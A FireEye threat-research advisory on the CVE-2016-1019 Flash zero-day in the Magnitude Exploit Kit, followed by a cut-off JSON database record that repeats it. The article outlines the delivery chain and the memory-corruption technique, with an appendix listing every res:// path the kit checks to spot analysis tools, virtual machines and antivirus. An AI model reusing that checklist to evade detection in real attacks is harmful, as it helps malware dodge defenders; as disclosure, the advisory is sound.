On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).
While version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.
##### Exploit Delivery Chain
Magnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen’s dimensions and color depth (Figure 1).

Figure 1. JS of Profile Gate
The server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.

Figure 2. JS of redirecting to main exploit page
In our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).

Figure 3. JS of loading exploits
##### The Flash Exploit
A memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker’s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit’s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.

Figure 4. ActionScript of Flash exploits
##### Conclusion
This is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications – such as Internet Explorer/Edge and Flash Player – change the game.
Despite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft.
Click [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.
##### Acknowledgements
A huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.
##### Appendix
res://\Program%20Files%20(x86)\Fiddler2\Fiddler.exe/#3/#32512
res://\Program%20Files\Fiddler2\Fiddler.exe/#3/#32512
res://\Program%20Files%20(x86)\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
res://\Program%20Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
res://\Program%20Files%20(x86)\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
res://\Program%20Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
res://\Program%20Files%20(x86)\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
res://\Program%20Files\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
res://\Program%20Files%20(x86)\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
res://\Program%20Files\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
res://\Program%20Files%20(x86)\Malwarebytes Anti-Malware\mbamext.dll/#2/202
res://\Program%20Files\Malwarebytes Anti-Malware\mbamext.dll/#2/202
res://\Program%20Files%20(x86)\Malwarebytes Anti-Malware\unins000.exe/#2/DISKIMAGE
res://\Program%20Files\Malwarebytes Anti-Malware\unins000.exe/#2/DISKIMAGE
res://\Program%20Files%20(x86)\Malwarebytes Anti-Exploit\mbae.exe/#2/200
res://\Program%20Files\Malwarebytes Anti-Exploit\mbae.exe/#2/200
res://\Program%20Files%20(x86)\Malwarebytes Anti-Exploit\mbae.exe/#2/201
res://\Program%20Files\Malwarebytes Anti-Exploit\mbae.exe/#2/201
res://\Program%20Files%20(x86)\Malwarebytes Anti-Exploit\unins000.exe/#2/DISKIMAGE
res://\Program%20Files\Malwarebytes Anti-Exploit\unins000.exe/#2/DISKIMAGE
res://\Program%20Files%20(x86)\Trend Micro\Titanium\TmConfig.dll/#2/#30994
res://\Program%20Files\Trend Micro\Titanium\TmConfig.dll/#2/#30994
res://\Program%20Files%20(x86)\Trend Micro\Titanium\TmSystemChecking.dll/#2/#30994
res://\Program%20Files\Trend Micro\Titanium\TmSystemChecking.dll/#2/#30994
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky CRYSTAL 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky CRYSTAL 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
{"id": "FIREEYE:1A61A821CE69D378830204326B2E938C", "type": "fireeye", "bulletinFamily": "info", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "description": "On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).\n\nWhile version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.\n\n##### Exploit Delivery Chain \n\n\nMagnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen\u2019s dimensions and color depth (Figure 1).\n\n\n\nFigure 1. JS of Profile Gate\n\nThe server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.\n\n\n\nFigure 2. JS of redirecting to main exploit page\n\nIn our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).\n\n\n\nFigure 3. JS of loading exploits\n\n##### The Flash Exploit\n\nA memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker\u2019s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit\u2019s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.\n\n\n\nFigure 4. ActionScript of Flash exploits\n\n##### Conclusion\n\nThis is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications \u2013 such as Internet Explorer/Edge and Flash Player \u2013 change the game.\n\nDespite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft. \n \nClick [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.\n\n##### Acknowledgements\n\nA huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.\n\n##### Appendix\n\nres://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files%20(x86)\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "published": "2016-04-07T08:30:00", "modified": "2016-04-07T08:30:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "reporter": "Genwei Jiang", "references": [], "cvelist": ["CVE-2016-1019", "CVE-2015-2419"], "lastseen": "2017-03-07T16:24:19", "viewCount": 197, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201604-7"]}, {"type": "attackerkb", "idList": ["AKB:1B9FE055-9F52-4311-A5FC-E996A72071B1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0843", "CPAI-2015-1058", "CPAI-2016-0264"]}, {"type": "cve", "idList": ["CVE-2015-2419", "CVE-2016-1015", "CVE-2016-1019"]}, {"type": "fireeye", "idList": ["FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "FIREEYE:0CAA37548C7EBA899FA1174794304489", "FIREEYE:2B54485AD5D7B8DCC55F5A6BE1F3DBD6", "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "FIREEYE:D549372E644DEECBB7AEE8031D35DA4D", "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "FIREEYE:DE62068C8D7AE6B9EE810D02BC01433E", "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069"]}, {"type": "freebsd", "idList": ["07888B49-35C4-11E6-8E82-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-08"]}, {"type": "kaspersky", "idList": ["KLA10634"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:97E85AF6235DC2739548158FE583610A"]}, {"type": "mmpc", "idList": ["MMPC:A8911A071FAE866BC15F59CA0B325D45"]}, {"type": "mscve", "idList": ["MS:ADV160001"]}, {"type": "mskb", "idList": ["KB3076321"]}, {"type": "nessus", "idList": ["9276.PRM", "FLASH_PLAYER_APSB16-10.NASL", "FREEBSD_PKG_07888B4935C411E68E82002590263BF5.NASL", "GENTOO_GLSA-201606-08.NASL", "MACOSX_FLASH_PLAYER_APSB16-10.NASL", "OPENSUSE-2016-433.NASL", "OPENSUSE-2016-440.NASL", "OPENSUSE-2016-585.NASL", "REDHAT-RHSA-2016-0610.NASL", "SMB_NT_MS15-065.NASL", "SMB_NT_MS16-050.NASL", "SUSE_SU-2016-0990-1.NASL", "SUSE_SU-2016-1305-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310131312", "OPENVAS:1361412562310805720", "OPENVAS:1361412562310807653", "OPENVAS:1361412562310807654", "OPENVAS:1361412562310807655", "OPENVAS:1361412562310810666", "OPENVAS:1361412562310810667", "OPENVAS:1361412562310810668", "OPENVAS:1361412562310810716", "OPENVAS:1361412562310810751", "OPENVAS:1361412562310810752", "OPENVAS:1361412562310851268", "OPENVAS:1361412562310851312"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "redhat", "idList": ["RHSA-2016:0610"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14594"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0987-1", "OPENSUSE-SU-2016:0997-1", "OPENSUSE-SU-2016:1157-1", "OPENSUSE-SU-2016:1306-1", "SUSE-SU-2016:0990-1", "SUSE-SU-2016:1305-1"]}, {"type": "symantec", "idList": ["SMNTC-75661"]}, {"type": "thn", "idList": ["THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "THN:BF8375E3582DA11921BF468B0D3C4F03", "THN:C86B358352EEF0DC351F2DD0FA088E77"]}, {"type": "threatpost", "idList": ["THREATPOST:02FB00D8BE50B1B6165E20F03EBF20C0", "THREATPOST:119E7D78B854D1FD10222FB18949985B", "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "THREATPOST:3F20438316043C71AAD9C85191711EEE", "THREATPOST:6844AEC17FA3A44CD47E847B8DC4AC54", "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "THREATPOST:B072B076007EAC04FA7859A728FEF476", 